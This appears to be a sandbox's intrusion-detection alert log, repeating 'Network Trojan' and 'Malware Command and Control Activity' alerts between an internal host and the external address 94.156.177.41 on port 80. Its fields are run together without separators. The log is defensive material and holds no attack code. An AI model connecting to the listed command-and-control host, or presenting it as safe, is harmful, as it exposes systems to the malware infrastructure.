                    2024-11-20T07:57:07.939075+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249177TCP
                    2024-11-20T07:57:09.113229+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249178TCP
                    2024-11-20T07:57:10.040363+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249182TCP
                    2024-11-20T07:57:11.268041+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249183TCP
                    2024-11-20T07:57:12.160366+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249185TCP
                    2024-11-20T07:57:13.070076+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249186TCP
                    2024-11-20T07:57:14.198397+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249187TCP
                    2024-11-20T07:57:15.544258+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249188TCP
                    2024-11-20T07:57:16.460615+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249189TCP
                    2024-11-20T07:57:17.352340+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249190TCP
                    2024-11-20T07:57:18.222070+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249191TCP
                    2024-11-20T07:57:19.101205+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249192TCP
                    2024-11-20T07:57:20.097314+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249193TCP
                    2024-11-20T07:57:21.197086+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249194TCP
                    2024-11-20T07:57:25.327626+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249195TCP
                    2024-11-20T07:57:26.330544+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249196TCP
                    2024-11-20T07:57:27.212143+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249197TCP
                    2024-11-20T07:57:28.073862+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249198TCP
                    2024-11-20T07:57:28.982464+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249199TCP
                    2024-11-20T07:57:29.979437+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249200TCP
                    2024-11-20T07:57:30.843035+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249201TCP
                    2024-11-20T07:57:31.716016+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249202TCP
                    2024-11-20T07:57:32.789112+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249203TCP
                    2024-11-20T07:57:33.773092+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249204TCP
                    2024-11-20T07:57:34.643251+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249205TCP
                    2024-11-20T07:57:35.511423+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249206TCP
                    2024-11-20T07:57:36.389874+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249207TCP
                    2024-11-20T07:57:37.249204+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249208TCP
                    2024-11-20T07:57:38.100844+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249209TCP
                    2024-11-20T07:57:38.960823+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249210TCP
                    2024-11-20T07:57:39.959250+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249211TCP
                    2024-11-20T07:57:40.821148+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249212TCP
                    2024-11-20T07:57:41.680888+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249213TCP
                    2024-11-20T07:57:42.548514+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249214TCP
                    2024-11-20T07:57:43.550061+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249215TCP
                    2024-11-20T07:57:44.546679+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249216TCP
                    2024-11-20T07:57:45.538504+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249217TCP
                    2024-11-20T07:57:46.397054+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249218TCP
                    2024-11-20T07:57:47.440139+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249219TCP
                    2024-11-20T07:57:48.355331+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249220TCP
                    2024-11-20T07:57:49.392166+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249221TCP
                    2024-11-20T07:57:50.401732+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249222TCP
                    2024-11-20T07:57:51.405120+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249223TCP
                    2024-11-20T07:57:52.419599+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249224TCP
                    2024-11-20T07:57:53.417983+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249225TCP
                    2024-11-20T07:57:54.302370+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249226TCP
                    2024-11-20T07:57:55.168793+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249227TCP
                    2024-11-20T07:57:56.042606+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249228TCP
                    2024-11-20T07:57:56.917175+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249229TCP
                    2024-11-20T07:57:57.919026+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249230TCP
                    2024-11-20T07:57:58.925815+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249231TCP
                    2024-11-20T07:58:00.184000+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249232TCP
                    2024-11-20T07:58:01.254920+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249233TCP
                    2024-11-20T07:58:02.257306+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249234TCP
                    2024-11-20T07:58:03.147969+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249235TCP
                    2024-11-20T07:58:04.017516+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249236TCP
                    2024-11-20T07:58:05.020538+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249237TCP
                    2024-11-20T07:58:05.893320+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249238TCP
                    2024-11-20T07:58:06.884043+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249239TCP
                    2024-11-20T07:58:07.913735+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249240TCP
                    2024-11-20T07:58:08.919532+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249241TCP
                    2024-11-20T07:58:09.795871+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249242TCP
                    2024-11-20T07:58:10.695527+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249243TCP
                    2024-11-20T07:58:11.692160+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249244TCP
                    2024-11-20T07:58:12.566542+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249245TCP
                    2024-11-20T07:58:13.446885+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249246TCP
                    2024-11-20T07:58:14.318123+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249247TCP
                    2024-11-20T07:58:15.165411+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249248TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:57:00.796820+010020243131Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                    2024-11-20T07:57:01.712250+010020243131Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                    2024-11-20T07:57:02.731919+010020243131Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                    2024-11-20T07:57:03.741633+010020243131Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                    2024-11-20T07:57:05.310719+010020243131Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                    2024-11-20T07:57:06.374526+010020243131Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                    2024-11-20T07:57:07.917653+010020243131Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                    2024-11-20T07:57:09.108399+010020243131Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                    2024-11-20T07:57:10.035512+010020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                    2024-11-20T07:57:11.261515+010020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                    2024-11-20T07:57:12.155460+010020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                    2024-11-20T07:57:13.065121+010020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                    2024-11-20T07:57:14.190184+010020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                    2024-11-20T07:57:15.539350+010020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                    2024-11-20T07:57:16.455575+010020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                    2024-11-20T07:57:17.347428+010020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                    2024-11-20T07:57:18.217076+010020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                    2024-11-20T07:57:19.096338+010020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                    2024-11-20T07:57:20.092497+010020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                    2024-11-20T07:57:21.192076+010020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                    2024-11-20T07:57:25.322789+010020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                    2024-11-20T07:57:26.325588+010020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                    2024-11-20T07:57:27.207355+010020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                    2024-11-20T07:57:28.068992+010020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                    2024-11-20T07:57:28.977622+010020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                    2024-11-20T07:57:29.974567+010020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                    2024-11-20T07:57:30.837963+010020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                    2024-11-20T07:57:31.706612+010020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                    2024-11-20T07:57:32.784000+010020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                    2024-11-20T07:57:33.768266+010020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                    2024-11-20T07:57:34.637117+010020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                    2024-11-20T07:57:35.506502+010020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                    2024-11-20T07:57:36.385030+010020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                    2024-11-20T07:57:37.244067+010020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                    2024-11-20T07:57:38.096012+010020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                    2024-11-20T07:57:38.955955+010020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                    2024-11-20T07:57:39.954333+010020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                    2024-11-20T07:57:40.816303+010020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                    2024-11-20T07:57:41.675988+010020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                    2024-11-20T07:57:42.543644+010020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                    2024-11-20T07:57:43.545186+010020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                    2024-11-20T07:57:44.541694+010020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                    2024-11-20T07:57:45.533689+010020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                    2024-11-20T07:57:46.392082+010020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                    2024-11-20T07:57:47.435298+010020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                    2024-11-20T07:57:48.350376+010020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                    2024-11-20T07:57:49.387296+010020243131Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                    2024-11-20T07:57:50.396869+010020243131Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                    2024-11-20T07:57:51.400249+010020243131Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                    2024-11-20T07:57:52.414699+010020243131Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                    2024-11-20T07:57:53.412939+010020243131Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                    2024-11-20T07:57:54.297505+010020243131Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                    2024-11-20T07:57:55.163739+010020243131Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                    2024-11-20T07:57:56.037599+010020243131Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                    2024-11-20T07:57:56.912319+010020243131Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                    2024-11-20T07:57:57.913305+010020243131Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                    2024-11-20T07:57:58.907092+010020243131Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                    2024-11-20T07:58:00.178852+010020243131Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                    2024-11-20T07:58:01.249409+010020243131Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                    2024-11-20T07:58:02.252446+010020243131Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                    2024-11-20T07:58:03.143133+010020243131Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                    2024-11-20T07:58:04.012582+010020243131Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                    2024-11-20T07:58:05.015654+010020243131Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                    2024-11-20T07:58:05.888261+010020243131Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                    2024-11-20T07:58:06.878837+010020243131Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                    2024-11-20T07:58:07.903785+010020243131Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                    2024-11-20T07:58:08.914515+010020243131Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                    2024-11-20T07:58:09.790944+010020243131Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                    2024-11-20T07:58:10.690343+010020243131Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                    2024-11-20T07:58:11.687264+010020243131Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                    2024-11-20T07:58:12.561533+010020243131Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                    2024-11-20T07:58:13.441956+010020243131Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                    2024-11-20T07:58:14.313214+010020243131Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                    2024-11-20T07:58:15.160454+010020243131Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:57:00.796820+010020243181Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                    2024-11-20T07:57:01.712250+010020243181Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                    2024-11-20T07:57:02.731919+010020243181Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                    2024-11-20T07:57:03.741633+010020243181Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                    2024-11-20T07:57:05.310719+010020243181Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                    2024-11-20T07:57:06.374526+010020243181Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                    2024-11-20T07:57:07.917653+010020243181Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                    2024-11-20T07:57:09.108399+010020243181Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                    2024-11-20T07:57:10.035512+010020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                    2024-11-20T07:57:11.261515+010020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                    2024-11-20T07:57:12.155460+010020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                    2024-11-20T07:57:13.065121+010020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                    2024-11-20T07:57:14.190184+010020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                    2024-11-20T07:57:15.539350+010020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                    2024-11-20T07:57:16.455575+010020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                    2024-11-20T07:57:17.347428+010020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                    2024-11-20T07:57:18.217076+010020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                    2024-11-20T07:57:19.096338+010020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                    2024-11-20T07:57:20.092497+010020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                    2024-11-20T07:57:21.192076+010020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                    2024-11-20T07:57:25.322789+010020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                    2024-11-20T07:57:26.325588+010020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                    2024-11-20T07:57:27.207355+010020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                    2024-11-20T07:57:28.068992+010020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                    2024-11-20T07:57:28.977622+010020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                    2024-11-20T07:57:29.974567+010020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                    2024-11-20T07:57:30.837963+010020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                    2024-11-20T07:57:31.706612+010020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                    2024-11-20T07:57:32.784000+010020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                    2024-11-20T07:57:33.768266+010020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                    2024-11-20T07:57:34.637117+010020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                    2024-11-20T07:57:35.506502+010020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                    2024-11-20T07:57:36.385030+010020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                    2024-11-20T07:57:37.244067+010020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                    2024-11-20T07:57:38.096012+010020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                    2024-11-20T07:57:38.955955+010020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                    2024-11-20T07:57:39.954333+010020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                    2024-11-20T07:57:40.816303+010020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                    2024-11-20T07:57:41.675988+010020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                    2024-11-20T07:57:42.543644+010020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                    2024-11-20T07:57:43.545186+010020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                    2024-11-20T07:57:44.541694+010020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                    2024-11-20T07:57:45.533689+010020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                    2024-11-20T07:57:46.392082+010020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                    2024-11-20T07:57:47.435298+010020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                    2024-11-20T07:57:48.350376+010020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                    2024-11-20T07:57:49.387296+010020243181Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                    2024-11-20T07:57:50.396869+010020243181Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                    2024-11-20T07:57:51.400249+010020243181Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                    2024-11-20T07:57:52.414699+010020243181Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                    2024-11-20T07:57:53.412939+010020243181Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                    2024-11-20T07:57:54.297505+010020243181Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                    2024-11-20T07:57:55.163739+010020243181Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                    2024-11-20T07:57:56.037599+010020243181Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                    2024-11-20T07:57:56.912319+010020243181Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                    2024-11-20T07:57:57.913305+010020243181Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                    2024-11-20T07:57:58.907092+010020243181Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                    2024-11-20T07:58:00.178852+010020243181Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                    2024-11-20T07:58:01.249409+010020243181Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                    2024-11-20T07:58:02.252446+010020243181Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                    2024-11-20T07:58:03.143133+010020243181Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                    2024-11-20T07:58:04.012582+010020243181Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                    2024-11-20T07:58:05.015654+010020243181Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                    2024-11-20T07:58:05.888261+010020243181Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                    2024-11-20T07:58:06.878837+010020243181Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                    2024-11-20T07:58:07.903785+010020243181Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                    2024-11-20T07:58:08.914515+010020243181Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                    2024-11-20T07:58:09.790944+010020243181Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                    2024-11-20T07:58:10.690343+010020243181Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                    2024-11-20T07:58:11.687264+010020243181Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                    2024-11-20T07:58:12.561533+010020243181Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                    2024-11-20T07:58:13.441956+010020243181Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                    2024-11-20T07:58:14.313214+010020243181Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                    2024-11-20T07:58:15.160454+010020243181Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:57.248279+010020216411A Network Trojan was detected192.168.2.224916894.156.177.4180TCP
                    2024-11-20T07:56:59.162067+010020216411A Network Trojan was detected192.168.2.224916994.156.177.4180TCP
                    2024-11-20T07:57:00.038068+010020216411A Network Trojan was detected192.168.2.224917094.156.177.4180TCP
                    2024-11-20T07:57:00.985981+010020216411A Network Trojan was detected192.168.2.224917194.156.177.4180TCP
                    2024-11-20T07:57:01.990103+010020216411A Network Trojan was detected192.168.2.224917294.156.177.4180TCP
                    2024-11-20T07:57:03.028263+010020216411A Network Trojan was detected192.168.2.224917394.156.177.4180TCP
                    2024-11-20T07:57:04.458084+010020216411A Network Trojan was detected192.168.2.224917494.156.177.4180TCP
                    2024-11-20T07:57:05.513581+010020216411A Network Trojan was detected192.168.2.224917694.156.177.4180TCP
                    2024-11-20T07:57:07.053237+010020216411A Network Trojan was detected192.168.2.224917794.156.177.4180TCP
                    2024-11-20T07:57:08.400152+010020216411A Network Trojan was detected192.168.2.224917894.156.177.4180TCP
                    2024-11-20T07:57:09.288353+010020216411A Network Trojan was detected192.168.2.224918294.156.177.4180TCP
                    2024-11-20T07:57:10.533829+010020216411A Network Trojan was detected192.168.2.224918394.156.177.4180TCP
                    2024-11-20T07:57:11.427592+010020216411A Network Trojan was detected192.168.2.224918594.156.177.4180TCP
                    2024-11-20T07:57:12.359101+010020216411A Network Trojan was detected192.168.2.224918694.156.177.4180TCP
                    2024-11-20T07:57:13.469417+010020216411A Network Trojan was detected192.168.2.224918794.156.177.4180TCP
                    2024-11-20T07:57:14.821226+010020216411A Network Trojan was detected192.168.2.224918894.156.177.4180TCP
                    2024-11-20T07:57:15.719445+010020216411A Network Trojan was detected192.168.2.224918994.156.177.4180TCP
                    2024-11-20T07:57:16.626398+010020216411A Network Trojan was detected192.168.2.224919094.156.177.4180TCP
                    2024-11-20T07:57:17.507138+010020216411A Network Trojan was detected192.168.2.224919194.156.177.4180TCP
                    2024-11-20T07:57:18.365734+010020216411A Network Trojan was detected192.168.2.224919294.156.177.4180TCP
                    2024-11-20T07:57:19.253733+010020216411A Network Trojan was detected192.168.2.224919394.156.177.4180TCP
                    2024-11-20T07:57:20.473746+010020216411A Network Trojan was detected192.168.2.224919494.156.177.4180TCP
                    2024-11-20T07:57:21.599286+010020216411A Network Trojan was detected192.168.2.224919594.156.177.4180TCP
                    2024-11-20T07:57:25.465376+010020216411A Network Trojan was detected192.168.2.224919694.156.177.4180TCP
                    2024-11-20T07:57:26.474558+010020216411A Network Trojan was detected192.168.2.224919794.156.177.4180TCP
                    2024-11-20T07:57:27.353742+010020216411A Network Trojan was detected192.168.2.224919894.156.177.4180TCP
                    2024-11-20T07:57:28.253668+010020216411A Network Trojan was detected192.168.2.224919994.156.177.4180TCP
                    2024-11-20T07:57:29.125788+010020216411A Network Trojan was detected192.168.2.224920094.156.177.4180TCP
                    2024-11-20T07:57:30.114920+010020216411A Network Trojan was detected192.168.2.224920194.156.177.4180TCP
                    2024-11-20T07:57:30.992768+010020216411A Network Trojan was detected192.168.2.224920294.156.177.4180TCP
                    2024-11-20T07:57:32.063042+010020216411A Network Trojan was detected192.168.2.224920394.156.177.4180TCP
                    2024-11-20T07:57:32.925555+010020216411A Network Trojan was detected192.168.2.224920494.156.177.4180TCP
                    2024-11-20T07:57:33.906030+010020216411A Network Trojan was detected192.168.2.224920594.156.177.4180TCP
                    2024-11-20T07:57:34.787024+010020216411A Network Trojan was detected192.168.2.224920694.156.177.4180TCP
                    2024-11-20T07:57:35.655030+010020216411A Network Trojan was detected192.168.2.224920794.156.177.4180TCP
                    2024-11-20T07:57:36.530041+010020216411A Network Trojan was detected192.168.2.224920894.156.177.4180TCP
                    2024-11-20T07:57:37.385969+010020216411A Network Trojan was detected192.168.2.224920994.156.177.4180TCP
                    2024-11-20T07:57:38.245541+010020216411A Network Trojan was detected192.168.2.224921094.156.177.4180TCP
                    2024-11-20T07:57:39.100304+010020216411A Network Trojan was detected192.168.2.224921194.156.177.4180TCP
                    2024-11-20T07:57:40.099524+010020216411A Network Trojan was detected192.168.2.224921294.156.177.4180TCP
                    2024-11-20T07:57:40.957522+010020216411A Network Trojan was detected192.168.2.224921394.156.177.4180TCP
                    2024-11-20T07:57:41.834157+010020216411A Network Trojan was detected192.168.2.224921494.156.177.4180TCP
                    2024-11-20T07:57:42.690842+010020216411A Network Trojan was detected192.168.2.224921594.156.177.4180TCP
                    2024-11-20T07:57:43.687015+010020216411A Network Trojan was detected192.168.2.224921694.156.177.4180TCP
                    2024-11-20T07:57:44.686743+010020216411A Network Trojan was detected192.168.2.224921794.156.177.4180TCP
                    2024-11-20T07:57:45.683162+010020216411A Network Trojan was detected192.168.2.224921894.156.177.4180TCP
                    2024-11-20T07:57:46.572052+010020216411A Network Trojan was detected192.168.2.224921994.156.177.4180TCP
                    2024-11-20T07:57:47.625431+010020216411A Network Trojan was detected192.168.2.224922094.156.177.4180TCP
                    2024-11-20T07:57:48.537909+010020216411A Network Trojan was detected192.168.2.224922194.156.177.4180TCP
                    2024-11-20T07:57:49.537253+010020216411A Network Trojan was detected192.168.2.224922294.156.177.4180TCP
                    2024-11-20T07:57:50.541403+010020216411A Network Trojan was detected192.168.2.224922394.156.177.4180TCP
                    2024-11-20T07:57:51.550185+010020216411A Network Trojan was detected192.168.2.224922494.156.177.4180TCP
                    2024-11-20T07:57:52.571474+010020216411A Network Trojan was detected192.168.2.224922594.156.177.4180TCP
                    2024-11-20T07:57:53.565464+010020216411A Network Trojan was detected192.168.2.224922694.156.177.4180TCP
                    2024-11-20T07:57:54.459148+010020216411A Network Trojan was detected192.168.2.224922794.156.177.4180TCP
                    2024-11-20T07:57:55.316399+010020216411A Network Trojan was detected192.168.2.224922894.156.177.4180TCP
                    2024-11-20T07:57:56.191793+010020216411A Network Trojan was detected192.168.2.224922994.156.177.4180TCP
